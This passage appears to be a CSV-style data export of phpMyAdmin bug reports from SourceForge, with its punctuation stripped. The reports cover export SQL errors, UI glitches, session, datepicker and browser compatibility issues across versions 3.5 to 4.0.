A lengthy page is loaded into the dialog and it is the most user unfriendly way to edit user privileges.
Original URL https sourceforge.net p phpmyadmin bugs 3791 Original author madhuracj Found in version 3.5.0","bug"
"24444","10185","PHP errors in transformation.
Currently demo server produces quite a lot of following errors PHP Fatal error Call to a member function getInfo ) on a non object in libraries transformations.lib.php on line 150 Original URL https sourceforge.net p phpmyadmin bugs 3792 Original author nijel Found in version Latest Git","bug"
"24444","10186","Creating new table or adding new column to a table throws 500 internal server error..
Unable to create a new table neither using the New link in navigation panel nor from Create table in main panel.
Similarly unable to create new column under a table.
Also on demo server, doing so throws internal server error, but no internal server error on my local machine.
Local PHP 5.3.6 13ubuntu3.7 Original URL https sourceforge.net p phpmyadmin bugs 3793 Original author atul5 Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 3793 attachment Demo server error.png","bug"
"24444","10187","failure to handle repeating empty columns when importing ODS.
There appears to be a problem with the importing of ODS files both into an existing table as well as triggering the creation of a new table).
The trouble seems to be a misreading of repeating empty columns.
I have noticed that disabling the conditional on line 147 as follows allows for a successful import in this case, but I m not familiar enough with the overall algorithm to know how that might negatively impact importing in other conditions if col count < count row >children table , true)) 1 || true) { I m attaching a sample ODS file that exhibits the behavior.
Cols 51 55 are supposed to be blank, but instead content in Col56 has shifted over to be adjacent to Col50.
Thanks for all your work!
Original URL https sourceforge.net p phpmyadmin bugs 3794 Original author dlopez2000 Found in version 3.3.7 Attachment http sourceforge.net p phpmyadmin bugs 3794 attachment sample phpmyadmin ods import1.ods","bug"
"24444","10188","Different tablenames in SQL create and setup.
Script examples create tables.sql creates all the tables with one extra underscore in tablename for example pma column info), but default tablenames in setup script are like pma column info Original URL https sourceforge.net p phpmyadmin bugs 3795 Original author snakeaas Found in version 4.0.0","bug"
"24444","10189","Adding extra graph to Status Monitor does not work.
When adding an extra parameter graph to the status monitor > Status > Monitor > Settings > Add Chart), clicking the Add this series link does not work.
Tested with 4.0 latest git) on demo server Original URL https sourceforge.net p phpmyadmin bugs 3796 Original author ruleant Found in version Latest Git","bug"
"24444","10190","Exporting row selection after ORDER BY.
How to reproduce Run this in SQL tab DROP TABLE IF EXISTS t1; CREATE TABLE t1 id INT); INSERT INTO t1 VALUES 1); SELECT FROM t1 ORDER BY id; Select the row.
Click Export.
Now this SQL appears SELECT FROM t1 ORDER BY id WHERE `t1`.`id` =1 ) ORDER BY id The ORDER BY line before WHERE is wrong and triggers error 1064 during export.
Original URL https sourceforge.net p phpmyadmin bugs 3797 Original author julianladisch Found in version 3.5.6","bug"
"24444","10191","editing field a record is selected by makes pma load forever.
If I select a record by issuing an SELECT FROM `table` WHERE `field` = value , edit that record, change the value for field and then press Go , the message Loading is shown forever.
The record is actually updated, but there is no visual indication of that.
I have to click Browser or Search again.
I am using phpMyAdmin 4.0.4.1, Firefox 22.0.
Original URL https sourceforge.net p phpmyadmin bugs 4024 Original author ci dev Found in version 4.0.4","bug"
"24444","10192","selecting rows using CHAR LENGTH keyfield)=keyvalue.
In 4.0.0 alpha2 or latest git 0c967a7ee6) execute this in SQL tab DROP TABLE IF EXISTS t1; CREATE TABLE t1 id INT NOT NULL, PRIMARY KEY id) ); INSERT INTO `t1` VALUES 2); SELECT FROM t1; Now select that row and after the label With selected click either Change, Delete or Export.
No row is used because of this wrong WHERE clause WHERE CHAR LENGTH `t1`.`id` ) =2 Original URL https sourceforge.net p phpmyadmin bugs 3798 Original author julianladisch Found in version 4.0.0","bug"
"24444","10193","IIS 7.5 token mismatch changing server variables.
As reported by an anonymous IRC user I m running latest 4.0.4.1 with IIS 7.5 PHP 5.2.17 Firefox 22 and wanted to change a server variable, but every time I clicked on one I got a token mismatch.
Turns out, line 128 of server variables.php does url = htmlspecialchars server variables.php?
.
PMA generate common url )); The html special chars converts an ` ` literal ampersand) to ` amp;` the character entity) where it shouldn t. This effectively makes it impossible to change any server variables via phpMyAdmin.
Changing it to url = server variables.php?
.
PMA generate common url )); kill the htmlspecialchars )) works.
But I m not certain this would be the correct fix.
On phpmyadmin devel, Marc points out > To be valid XHTML, we have to use amp; instead of as the separator.
So far we ve tested Firefox 22 with a Linux server and have no problems.
Original URL https sourceforge.net p phpmyadmin bugs 4026 Original author ibennetch Found in version 4.0.4","bug"
"24444","10194","Incorrect select field change on ctrl key navigation in Firefox.
To reproduce Go to create table form Click on any SELECT element to focus it i.e Type) Press CTRL Arrow Down Expected The cursor moves to the next SELECT element below Actual The cursor moves to the next SELECT element below The selected value in the next SELECT element below is changed MASTER is affected as well Original URL https sourceforge.net p phpmyadmin bugs 3799 Original author roccivic Found in version 3.5.6","bug"
"24444","10195","cfg[ MaxExactCount ] is ignored when BROWSING is back.
Hi, I have a problem with phpmyadmin version 4.0.4.1 We have some very large innodb tables more than 750 mio rows) If I click on this large table in phpmyadmin only a orange window with Loading is shown.
In the background a SELECT COUNT ) FROM TABLE is running and never comes back.
I found a old bug with title cfg[ MaxExactCount ] is ignored when BROWSING .
But this bug is fixed since years.
http sourceforge.net p phpmyadmin bugs 865 I tried to set MaxExactCount to different values but nothing seems to fix the problem.
Regards Eichl Original URL https sourceforge.net p phpmyadmin bugs 4027 Original author eichl Found in version 4.0.4","bug"
"24444","10196","ORDER BY SUM `field`) does not sort DESC.
The query SELECT SUM field) FROM table GROUP BY field2 can be sorted ASC and DESC on the SUM column using the GUI.
But as soon as I escape the argument, sorting will stick to ASC.
SELECT SUM `field`) FROM table GROUP BY field2 note the backticks around field ) cannot be sorted DESC on SUM column using the GUI.
This is a follow up of [bugs 619].
Original URL https sourceforge.net p phpmyadmin bugs 4030 Original author ci dev Found in version 4.0.4","bug"
"24444","10197","Incorrect keyhandler behaviour 2.
To reproduce Go to create table form Click into any column Name input fields Press CTRL Arrow Right 10 times Expected The cursor moves to the last element on the current table row Actual The cursor moves to Length Values and refuses to proceed further MASTER is affected as well Original URL https sourceforge.net p phpmyadmin bugs 3800 Original author roccivic Found in version 3.5.6","bug"
"24444","10198","datetime picker 24h time format broken.
See attached screenshots, working in 3.5.6 and broken in 4.0.0 alpha2.
Original URL https sourceforge.net p phpmyadmin bugs 3801 Original author tgurr Found in version 4.0.0 Attachment http sourceforge.net p phpmyadmin bugs 3801 attachment phpmyadmin 4.0.0 alpha2.png","bug"
"24444","10199","Inline query edit has incorrect overflow.
Inline query editing has incorrect overflow height set for the textarea which results in the the Go Cancel buttons to be hidden.
See attached two screenshots.
Expected behaviour would be no scrollbars and visible Go Cancel buttons, and perhaps a growing textarea if the query is large.
Original URL https sourceforge.net p phpmyadmin bugs 4034 Original author ekitomat Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 4034 attachment 2013 07 26 002615 637x215 scrot.png Attachment http sourceforge.net p phpmyadmin bugs 4034 attachment 2013 07 26 002607 628x213 scrot.png","bug"
"24444","10200","Datepicker displayed just the first time.
To reproduce 1. start phpMyAdmin 2. visit sakila.payment 3. click on Insert 4. click on the calendar icon for payment date the picker opens 5. click on Insert 6. click on the calendar icon for payment date no picker 7. browse the table 8. click on Edit from one of the rows 9. click on the calendar icon for payment date no picker Original URL https sourceforge.net p phpmyadmin bugs 3802 Original author lem9 Found in version Latest Git","bug"
"24444","10201","Grid editing a DATE column.
Opening grid editing for a DATE column not DATETIME) displays in the textarea the date followed by 00 00 00 .
Original URL https sourceforge.net p phpmyadmin bugs 3803 Original author lem9 Found in version Latest Git","bug"
"24444","10202","Table without primary or unique key is missing row action links.
It seems like for a table with small amount of columns it doesn t shows the select tick box,edit,copy and delete when browse the table.See the attachment.
Original URL https sourceforge.net p phpmyadmin bugs 3804 Original author shamika09 Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 3804 attachment EditError.jpg","bug"
"24444","10203","f won t list field names in DefaultQueryTable.
When I add a default query by using the DefaultQueryTable, the string f is returned instead of tables.
> DefaultQueryTable > cfg[ DefaultQueryTable ] = SELECT f > FROM t > WHERE 1 > ; > ; will display > SELECT f > FROM > WHERE 1 > ; This seems like a reappearence of a bug solved in 2005 http sourceforge.net p phpmyadmin bugs 1860 I also seriously miss the opportunity of letting f displaying each field on a new row in the query window, not just on one line.
Original URL https sourceforge.net p phpmyadmin bugs 3805 Original author konghara1d Found in version 3.5.6","bug"
"24444","10204","grid editing utf8 set enum value.
RELEASE 4 0 0ALPHA2 87 g9c485f8 http demo.phpmyadmin.net master Execute this in SQL window DROP TABLE IF EXISTS t1; CREATE TABLE t1 id INT NOT NULL, umlaut SET xc3xa4 , xc3xb6 ), PRIMARY KEY id) ) ENGINE=InnoDB; INSERT INTO t1 VALUES 1, xc3xa4 ); SELECT FROM t1; In the select result table, double click on xc3xa4.
The subwindow with both xc3xa4 and xc3xb6 pops up.
Bug xc3xa4 is not selected.
Therefore when closing the subwindow xc3xa4 gets overwritten with an empty string in the database.
Original URL https sourceforge.net p phpmyadmin bugs 3813 Original author julianladisch Found in version 4.0.0","bug"
"24444","10205","session expired in 3 clicks.
Hi!
got some session problem.
i did update my PMA on a Centos5 to 3.5.6, and started to get Your session has expired.
Please log in again.
after a few seconds or lees of been loged.
So i updated to 4 alpha2, same, then in the setup i noticed that only some times i got a Warning Unknown Failed to write session data memcache).
Please verify that the current setting of session.save path is correct tcp 127.0.0.1 11211) in Unknown on line 0 and of course the setup data got lost every time... so... i updated to php 5.4.11, memcached to 1.4.15 and memcache to 2.2.7 also xcache to 2.0.1 ) and the issue did not go away, so i tried the last git, ....same.
i triend without config.inc.php .... same.
explorer... chrome... same.
im out of ideas help plis Original URL https sourceforge.net p phpmyadmin bugs 3814 Original author allmoz Found in version Latest Git","bug"
"24444","10206","SQL query malfunction in IE8.
When entering a query the SELECT FROM `counter` WHERE id=1; becomes SELECT FROM `counter` WHERE 1 Original URL https sourceforge.net p phpmyadmin bugs 3815 Original author positse Found in version 3.5.4","bug"
"24444","10207","3.5 missing server processlist.php.
The file server processlist.php is missing in 3.5.5 and 3.5.6), along with the associated tab.
However you can still set this as the default tab in config, which then produces an error.
Is this feature meant to be gone?
I couldn t find anything in the documentation to say so.
Original URL https sourceforge.net p phpmyadmin bugs 3816 Original author ddonachie Found in version 3.5.6","bug"
"24444","10208","Duplicate Constraints Being Added on Database Copy.
In v3.5.4 and v3.5.6, I m running into problems with unexpected constraints being added when I copy an InnoDB database.
If I don t check the Add Constraints box, the constraints are still added in the copy.
If I do check the Add Constraints box, duplicates of the constraints are added.
Through a couple copies in testing, I ended up with 8 copies of the same constraint.
Bug 3417 appears to be the same issue.
It was supposed to have been fixed in v3.5.0 but it looks like the problem is back.
Original URL https sourceforge.net p phpmyadmin bugs 3817 Original author bitmapped Found in version 3.5.6","bug"
"24444","10209","Unable to edit table data.
Not sure if this is a valid bug since phpmyadmin outputs a hint indicating what s the issue This table does not contain a unique column.
Grid edit, checkbox, Edit, Copy and Delete features are not available.
But it works fine in phpmyadmin 3.5.6.
Is there any option to be able to restore the edit functionality or do we have to alter the table structure?
Please see attached screenshots for the differences.
Original URL https sourceforge.net p phpmyadmin bugs 3819 Original author tgurr Found in version 4.0.0 Attachment http sourceforge.net p phpmyadmin bugs 3819 attachment phpmyadmin 3.5.6.png","bug"
"24444","10210","phpMyAdmin fails to connect to MySQL via named pipes Windows)..
This appears to be a xe2x80x9cbugxe2x80x9d when phpMyAdmin fails to connect to MySQL server via named pipe with different from default i.e xe2x80x9cmysqlxe2x80x9d) name.
System Windows 7 Ultimate x32 and x64), SP1 Server Apache 2.4.4 Win64 and Win32) with mod fcgid 2.3.7 phpMyAdmin version 4.0.4.1 but previous versions was noted to behave in identical maner); MySQL Server version 5.6.12 MySQL Community Server GPL) same with previous stable versions); php version 5.5.0 same with previous stable versions).
Connection established only when default pipe s name i.e xe2x80x9cmysqlxe2x80x9d) is configured as follows My.ini [client] socket = mysql optional) pipe [mysqld] socket = mysql optional) skip networking enable named pipe config.inc.php cfg[ blowfish secret ] = whatever ; i = 0; i ; cfg[ Servers ][ i][ auth type ] = cookie ; cfg[ Servers ][ i][ host ] = .
; cfg[ Servers ][ i][ connect type ] = socket ; cfg[ Servers ][ i][ compress ] = false; cfg[ Servers ][ i][ extension ] = mysqli ; cfg[ Servers ][ i][ AllowNoPassword ] = false; As soon as the default name xe2x80x9cmysqlxe2x80x9d) of the pipe is changed to any other name, the phpMyAdmin is not able to connect to MySQL server.
Connection error 2002 Cannot log in to the MySQL server .
It is not possible to establish connection even when the new name of the pipe is configured with the following setting cfg[ Servers ][ i][ socket ] = ; in the config.inc.php e.g.
cfg[ Servers ][ i][ socket ] = mysql.sock ;)) Examples of the names of pipes that are not working my.ini) socket = xe2x80x9cmysql1xe2x80x9d socket = mysql33 socket = xe2x80x9cmysql.sockxe2x80x9d etc.
Original URL https sourceforge.net p phpmyadmin bugs 4045 Original author ar79php Found in version 4.0.4","bug"
"24444","10211","hide db, only db not working in left panel.
cfg[ Servers ][ i][ hide db ] = information schema|performance schema|mysql) ; Does work in 3.5.6 but doesn t seem to do anything in 4.0.0 beta1).
I also tried something simpler without regex but it also doesn t work, the databases are still displayed in the navigation sidebar.
Original URL https sourceforge.net p phpmyadmin bugs 3820 Original author tgurr Found in version 4.2.5","bug"
"24444","10212","Setup page dies without error on loading CONFIG FILE.
PHP dies without an error at the libraries config ConfigFile.class.php construct ) line 85 ... this >orgCfgObject = new PMA Config CONFIG FILE); ...causes the whole thing to just die out without an error, even though error reporting is enabled.
It is running on nxingx, the rest of PhpMyAdmin runs perfectly well.
See this post for more details http stackoverflow.com questions 17123624 phpmyadmin setup show blank screen while pma itself works Original URL https sourceforge.net p phpmyadmin bugs 4049 Original author nixxle Found in version 4.0.5","bug"
"24444","10213","Safari white page.
From xc3x89lodie Bossier Greetings, It s not the first time i see this problem of incompatibility between Safary and PMA.
When we are loged into PhpMyAdmin with Safari, we have a full white page.
Il was solved there are 1 year 2012 05 04) by this ticket http sourceforge.net tracker ?func=detail aid=3523499 group id=23067 atid=377408 Bug the problem come back again.
My customers have tested several browser Chrome OK Firefox OK Opera OK Safari NOT OK On Mac and Windows and Safari show a full white page after to have logged correctly.
Safari 5.1.7 7534.57.2) on Windows 8 and same for Safari 5.1.2 7534.52.7) on Windows 7 with PMA 3.5.6 Original URL https sourceforge.net p phpmyadmin bugs 3821 Original author lem9 Found in version 3.5.6","bug"
"24444","10214","Text in SQL query window is too small.
I have updated to version 3.5.6 and find that the font size in the SQL Query window has become minute see screenshot attachment).
Please adjust so that it is the same size as the surrounding text.
Or make it configurable.
Thanks.
Original URL https sourceforge.net p phpmyadmin bugs 3822 Original author wishbone42 Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 3822 attachment sql 20query 20window 20phpMyAdmin 203.5.6.png","bug"
"24444","10215","Anonymous function issue with PHP 5.2.8 when clicking on Export menu).
Looks like I have another compatibility issue with PHP5.2 [13 Feb 2013 03 24 28] PHP Parse error syntax error, unexpected T FUNCTION in web libraries properties options OptionsPropertyGroup.class.php on line 62 see below ) [13 Feb 2013 03 24 28] PHP Stack trace [13 Feb 2013 03 24 28] PHP 1.
{main} ) web db export.php 0 [13 Feb 2013 03 24 28] PHP 2. require once ) web db export.php 86 [13 Feb 2013 03 24 28] PHP 3.
PMA getPlugins ) web libraries display export.lib.php 44 [13 Feb 2013 03 24 28] PHP 4.
ExportHtmlword > construct ) web libraries plugin interface.lib.php 74 [13 Feb 2013 03 24 28] PHP 5.
ExportHtmlword >setProperties ) web libraries plugins export ExportHtmlword.class.php 29 [13 Feb 2013 03 24 28] PHP 6. include once ) web libraries plugins export ExportHtmlword.class.php 41 The issue appears when I click the Export menu.
I think the issue is due to the anonymous function available only in PHP 5.3. see http php.net manual en functions.anonymous.php This issue appears on the release PMA 4.0.0 public function removeProperty property) { this > properties = array udiff this >getProperties ), array property), function a, b) { return a === b ) ?
0 1; } ); } Sorry, I don t have the time right now to investigate, but let me know if you need me at some point to test something.
Thanks JT Original URL https sourceforge.net p phpmyadmin bugs 3823 Original author djaity Found in version 4.0.0","bug"
"24444","10216","SQL executed from query window opens new tab window.
The query window used to execute SQL in window from where it has been launched.
In current git, it does open new window for me...
Original URL https sourceforge.net p phpmyadmin bugs 3824 Original author nijel Found in version Latest Git","bug"
"24444","10217","Structure tab for a view results in undefined index notices..
When viewing the Structure tab for a view on the demo server, I see a notice about undefined index for each row.
For example, on the demo server go to the Sakila database, then the staff list view, then the Structure tab.
After the regular phpMyAdmin output, I see this Notice in .
tbl structure.php 297 Undefined index ID Backtrace Notice in .
tbl structure.php 297 Undefined index name Backtrace Notice in .
tbl structure.php 297 Undefined index address Backtrace Notice in .
tbl structure.php 297 Undefined index zip code Backtrace Notice in .
tbl structure.php 297 Undefined index phone Backtrace Notice in .
tbl structure.php 297 Undefined index city Backtrace Notice in .
tbl structure.php 297 Undefined index country Backtrace Notice in .
tbl structure.php 297 Undefined index SID Backtrace Original URL https sourceforge.net p phpmyadmin bugs 3825 Original author ibennetch Found in version Latest Git","bug"
"24444","10218","3.5.7 version in git.
The remotes origin STABLE don t point to the 3.5.7 version in git.
Original URL https sourceforge.net p phpmyadmin bugs 3826 Original author alephlg Found in version 3.5.7","bug"
"24444","10219","Table specific privileges not displayed for db name containing underscore.
Phpmyadmin version 3.5.6 nginx 1.1.19 Database client version libmysql 5.5.29 PHP extension mysqli Software version 5.5.29 0ubuntu0.12.04.1 Ubuntu) Table speciffic privileges are not displayed.
Original URL https sourceforge.net p phpmyadmin bugs 3827 Original author tomaszszuster Found in version 3.5.6","bug"
"24444","10220","Enable Query Profiling Crashes Javascript Based Navigation.
After enabling the profiling functionality for sql queries on the browse page of a table, a bug in the Javascript code disables any JavaScript based navigation and functionality.
Logging out and in is the only way to disable the profiling function, which results in a usable phpMyAdmin interface again.
Error trace in console Uncaught ReferenceError makeProfilingChart is not defined anonymous function) anonymous function) get scripts.js.php 14 bG.extend.globalEval get scripts.js.php 14 anonymous function) get scripts.js.php 21 bG.extend.each get scripts.js.php 14 bG.fn.extend.domManip get scripts.js.php 21 bG.fn.extend.before get scripts.js.php 21 anonymous function) get scripts.js.php 21 bG.extend.each get scripts.js.php 14 bG.fn.bG.each get scripts.js.php 14 bG.fn.extend.replaceWith get scripts.js.php 21 anonymous function) get scripts.js.php 23 AJAX.scriptHandler.reset get scripts.js.php 23 AJAX.responseHandler get scripts.js.php 23 bZ get scripts.js.php 14 b7.fireWith get scripts.js.php 14 ca get scripts.js.php 21 bZ get scripts.js.php 21 Used client software Chrome 24 Windows 7 64 bits phpMyAdmin 4.0.0 beta1 Served from nginx 1.1.19 Database client version libmysql 5.5.29 PHP extension mysqli Ubuntu 12.04 Original URL https sourceforge.net p phpmyadmin bugs 3829 Original author skoonhoven Found in version 4.0.0","bug"
"24444","10221","Can t export custom query because it lowercases table names.
Bug happens in 3.5.6 Have not tried 3.5.7 yet.
1. click on a database.
2. click on a table that has any uppercase letters in it s name 3. click on the checkbox for one of the rows and then click export at the bottom.
It will export the table schema ok create table if not exists... but when it gets to the inserts it says Error reading data 1146 Table dbname.courses doesn t exist) If you try to export the entire table with the export button at the top it works just fine.
Original URL https sourceforge.net p phpmyadmin bugs 3830 Original author mysourceforgeun Found in version 3.5.6","bug"
"24444","10222","Running delete query asks for confirmation but says it was already executed.
See attached image.
I ran a DELETE query and it came up with this screen, which says at the top Your SQL query has been executed successfully , but then has the confirmation box below.
Note, the query had NOT been executed as all the rows were still in the table.
So the bug is the display of the success message.
Original URL https sourceforge.net p phpmyadmin bugs 4059 Original author svivian Found in version 4.0.6 Attachment http sourceforge.net p phpmyadmin bugs 4059 attachment phpmyadmin bug delete.jpg","bug"
"24444","10223","Scrollbar in navigation bar in chrome.
The new tree of databases is not scrollable when the list of databases exceeds the height of the browser window in latest Chrome.
It does work in Firefox 18.0.2 on Linux.
Best regards, Eric Ps.
The old select box db mode, is that deprecated as of now?
Original URL https sourceforge.net p phpmyadmin bugs 3831 Original author ekitomat Found in version Latest Git","bug"
"24444","10224","Unable to upload blob data while insering row into a table.
Table structure CREATE TABLE IF NOT EXISTS `testblob` `id` int 11) NOT NULL, `name` varchar 56) NOT NULL, `image` blob NOT NULL, PRIMARY KEY `id`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; 1.
Click on the table, go to Insert page.
2.
Try inserting a row, select some image for the BLOB field.
3.
Click Go and just non blob fields are inserted.
Found it working fine in 3.5.4.
Also, MIME transformations work fine in latest git too but not upload.
Original URL https sourceforge.net p phpmyadmin bugs 3832 Original author atul5 Found in version Latest Git","bug"
"24444","10225","Undefined variable sql limit to append.
I m a little unsure of what s going on here.
Sometimes I get the error message > Notice in .
sql.php 1225 Undefined variable sql limit to append > Backtrace > .
import.php 569 include .
sql.php) when executing a manual SQL query.
It doesn t happen every time, though.
On the demo server, I have done this From the main page, click the SQL tab Submit use sakila; show tables; From the results page, click the SQL tab The error is displayed at the bottom of the page Run the same query a second time The error continues to be displayed at the bottom of the page Then I clicked the Home icon from the navigation frame not a frame anymore, but you know what I mean) and tried again, using the query use information scheme; show tables; with the same result I saw the error message.
I then tried the same sequence with a third query use sakila; select from actor .
I did NOT see the error message.
I wondered if it was related to this message > This table does not contain a unique column.
Grid edit, checkbox, Edit, Copy and Delete features are not available.
Which appears at the top of the first two queries and not on the third.
So I duplicated the actor table, dropped the two indexes, and tried to recreate.
It does not seem to be related, as I was still unable to recreate the error message even without any unique key index.
Any ideas what s going on here?
Original URL https sourceforge.net p phpmyadmin bugs 3833 Original author ibennetch Found in version Latest Git","bug"
"24444","10226","Javascript error on specific string.
Test on Safari version 6.0.2 MAC OSX 10.8.2 ) Test done on Firefox 17.0.1 on MAC Test case CREATE TABLE `mt demo caption` `title` varchar 250) NOT NULL) ENGINE=InnoDB DEFAULT CHARSET=utf8 INSERT INTO `zzzz`.`mt demo caption` `title`) VALUES zafpkpjnrehfgiluehbkjvezbglvjkzehrbgjlvkezrbgkvljzergbkjzerbgk ); I launch the following SQL SELECT command with phpMyadmin SELECT MT.title,ROUND RAND ) 100000) RANDOM FROM `mt demo caption` MT WHERE 1 = 1 AND `title` = zafpkpjnrehfgiluehbkjvezbglvjkzehrbgjlvkezrbgkvljzergbkjzerbgk I get line as expected but The bug When i want to edit the title column by left clicking on line then nothing append input area doesn t appear ).
I open javascript console and get the following message TypeError undefined is not an object evaluating b this).data qtip ).interfaces ) Original URL https sourceforge.net p phpmyadmin bugs 3834 Original author chezbas Found in version 3.5.7 Attachment http sourceforge.net p phpmyadmin bugs 3834 attachment bug.png","bug"
"24444","10227","Select all rows and than edit doesn t work.
Select all rows and than edit doesn t work, instead it s de selecting the rows.
Original URL https sourceforge.net p phpmyadmin bugs 3836 Original author treggster Found in version 3.5.3","bug"
"24444","10228","Adding a new column to a table will leave the column editor html at the bottom.
When you go to a table > Structure Then add a new column, enter column definition > Save The column will be added to the table and the structure of the table will be displayed.
However on the bottom of the page it will still display the form you just used to add the column.
This should be removed.
Original URL https sourceforge.net p phpmyadmin bugs 3837 Original author gtoniser Found in version 4.0.0 Attachment http sourceforge.net p phpmyadmin bugs 3837 attachment phpmyadmin columnbug.png","bug"
"24444","10229","Modifying a column does not show the result of the operation.
After attempting to modify a column in tbl structure.php the page goes back to the table structure without giving any feedback of the modified column.
It does not display errors if they occurred or if the modification was successful.
Original URL https sourceforge.net p phpmyadmin bugs 3838 Original author gtoniser Found in version 4.0.0","bug"
"24444","10230","Index comment is supported only starting with MySQL 5.5.
When I try to add composite index to the table > Structure > scroll down to Indexes > create an index on 3 columns >Go) I fill up fields all or some.. doesn t matter.. checked on different tables) and then i see this error > 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near COMMENT dfdf at line 1 POST request data nocache {some digits here} ajax request true create index 1 db testdb do save data 1 index[Index comment] dfdf index[Index type] INDEX index[Key name] testindex1 index[columns][names][] testfield1 index[columns][names][] testfield2 index[columns][names][] id index[columns][sub parts]... index[columns][sub parts]... index[columns][sub parts]... table test1 token {token here} Substring from answer >sql query=ALTER TABLE 60testdb 60.
60test1 60 ADD INDEX 60testindex1 60 28 60testfield1 60 281 29 2C 60testfield2 60 281 29 2C 60id 60 281 29 29COMMENT 27dfdf 27 3B amp;show query=1 Original URL https sourceforge.net p phpmyadmin bugs 3839 Original author esche0 Found in version 4.0.0","bug"
"24444","10231","When exporting to gzip format, the data is compressed 2 times.
When exporting to gzip format, the data is compressed 2 times.
As I see it is because of option onfly compression .
Original URL https sourceforge.net p phpmyadmin bugs 3840 Original author gemorroj Found in version 4.1.3","bug"
"24444","10232","URL lists index.php and token twice.
This seems wrong.
On the demo server so auth type cookie), the first URL I get after authenticating so when I m on the main page) is > http demo.phpmyadmin.net master index.php?token=a55a43cae97767fcb48412aa732e43ae PMAURL 0 index.php?db= table= server=2 target= token=a55a43cae97767fcb48412aa732e43ae As you can see the token is in there twice, as well as two references to index.php.
Looks like something went wrong trying to create the URL.
Original URL https sourceforge.net p phpmyadmin bugs 3841 Original author ibennetch Found in version Latest Git","bug"
"24444","10233","Add a credit section for documentation translators.
I couldn t reopen ticket [ 1254] due to insufficient privileges.
There was a regression.
Unless I m wrong, this section disappeared with the recent changements in documentation translation system syntax.
Could you add it back please?
Original URL https sourceforge.net p phpmyadmin bugs 3843 Original author psychictv Found in version 3.3.7","bug"
"24444","10234","PMA doesn t recognise views on drop export import.
PHPMyadmin doesn t recognise views on drop, create tries to handle like a table.
For example, I have a view userinfo view, if I export the database, the query assoicated with the view is CREATE TABLE IF NOT EXISTS `view userlist` .....
I prefer to create views with view prefix); Same happens when I want to drop a view trough the myadmin s UI, it creates a DROP TABLE view name query instead of DROP VIEW view name ; MyAdmin V 3.5.7 MySql V 5.0.51a 24 lenny5 log Debian) libmysql 5.0.51a Original URL https sourceforge.net p phpmyadmin bugs 3846 Original author vfiber Found in version 3.5.7","bug"
"24444","10235","Renaming a table does not display the query.
Table view > Operations > Rename table > OK What happens is that the table gets renamed, but the UI doesn t give any feedback and doesnt refresh.
In my console there is the following error TypeError a is undefined get sc...ture.js line 92) Any actions after this will throw errors too since it can t find the table anymore which is logical since it is renamed) Original URL https sourceforge.net p phpmyadmin bugs 3847 Original author gtoniser Found in version 4.0.0","bug"
"24444","10236","Unable to export when database name contains a hyphen.
Unable to export from a database when it s name contains a hyphen.
Clicking the export button takes you back to the front PMA screen.
Original URL https sourceforge.net p phpmyadmin bugs 3848 Original author fire555 Found in version 3.5.7","bug"
"24444","10237","Hiding Databases from PMA.
The config setting cfg[ Servers ][ i][ hide db ] is not jet implemented correctly on the right side, all is well but the left side always shows all databases!
Original URL https sourceforge.net p phpmyadmin bugs 3849 Original author macwinnie Found in version 4.0.0","bug"
"24444","10238","Get 500 Internal Server Error with IPv6 after login..
Always get 500 error when log in with IPv6.
IPv4 is fine, but just after login with IPv6, the system goes down, and it returns 500.
If enable log errors in PHP, an empty page is returned.
Server Linux version 2.6.32 042stab065.3, debian 6.0 Web Server nginx 1.2.7 with php5 fpm 5.3.22 1 dotdeb.0 MySQL Ver 14.14 Distrib 5.5.30 And how to enable error reporting in pma?
I didn t find a way to enable error reporting, so I can t offer any further information.
Original URL https sourceforge.net p phpmyadmin bugs 3850 Original author briage Found in version 3.5.7","bug"
"24444","10239","Language problem.
When in the Appearance Settings the language Nederlands Dutch is selected than the selection Partial texts or Full texts in the browser window acts the same.
In both cases it is Full texts .
Changing the language back to English, it works fine.
Original URL https sourceforge.net p phpmyadmin bugs 4077 Original author wimmic Found in version 4.0.5","bug"
"24444","10240","Firefox favicon not loading.
Original URL https sourceforge.net p phpmyadmin bugs 3851 Original author eugeneg Found in version 4.0.0","bug"
"24444","10241","Copy Table Add AUTO INCREMENT value checkbox not working.
When you copy a table with Structure only and check the Add AUTO INCREMENT value checkbox, the new table should have the same next autoindex like the copied table, but it has 1 as next autoindex.
Tested on http demo.phpmyadmin.net master Database TEST AUTO INCREMENT COPY ) Version information 4.1 dev, latest stable version 4.0.5 Git revision ee1529a from master branch, committed on Sep 02, 2013 at 12 42 AM by Weblate Original URL https sourceforge.net p phpmyadmin bugs 4079 Original author rm km it Found in version 4.0.6","bug"
"24444","10242","Incorrect header for Safari 6.0.
PHPMyAdmin version 3.5.7 MySQL version 5.5.30 PHP version 5.3.22 It looks like Safari 6.0 changed the X WebKit CSP header syntax.
I kept getting an error in the console see attachment) and inline editting didn t work, so I tried multiple things and changing this header solved all problems.
To clarify Safari 5.1 syntax X WebKit CSP allow self ; options inline script eval script Safari 6.0 syntax X WebKit CSP default src self ; script src self unsafe inline unsafe eval ; style src self unsafe inline Original URL https sourceforge.net p phpmyadmin bugs 3854 Original author dododedodonl Found in version 3.5.7 Attachment http sourceforge.net p phpmyadmin bugs 3854 attachment Schermafbeelding 202013 03 21 20om 2018.42.13.png","bug"
"24444","10243","IE10 Blank screen issue.
When I click a table name or any of the action tabs), the right pane always show up as a blank screen.
This issue started after installing Internet Explorer 10.
The only way to solve it is to refresh the page.
Original URL https sourceforge.net p phpmyadmin bugs 3855 Original author mayhem30 Found in version 3.5.7","bug"
"24444","10244","Clicking OK from edit popup opens new tab.
When you click edit below the SQL field a popup window opens.
If you click OK in the popup the query is executed in a newly opened tab instead the one where you clicked edit.
Tested on http demo.phpmyadmin.net master in Firefox an Chrome but it s already 4.0.6 Original URL https sourceforge.net p phpmyadmin bugs 4086 Original author rm km it Found in version 4.0.6","bug"
"24444","10245","Moving Columns will alter column definition.
Using MySQL 5.6.13, PHPmyAdmin 4.0.6, InnoDB This Version of MySQL more strict than older versions and does not allow inserting rows if one column is not defined in the query and has no default value in the table definition.
Unfortunately, moving columns will erase the default value of VARCHAR columns, at least if that default value is empty string).
There is a big difference between empty string and nothing set at all, at least for MySQL 5.6.x.
Furthermore if you have a CURRENT TIMESTAMP default value in a DATETIME column, phpmyadmin will report an error message invalid sql statement) when moving around.
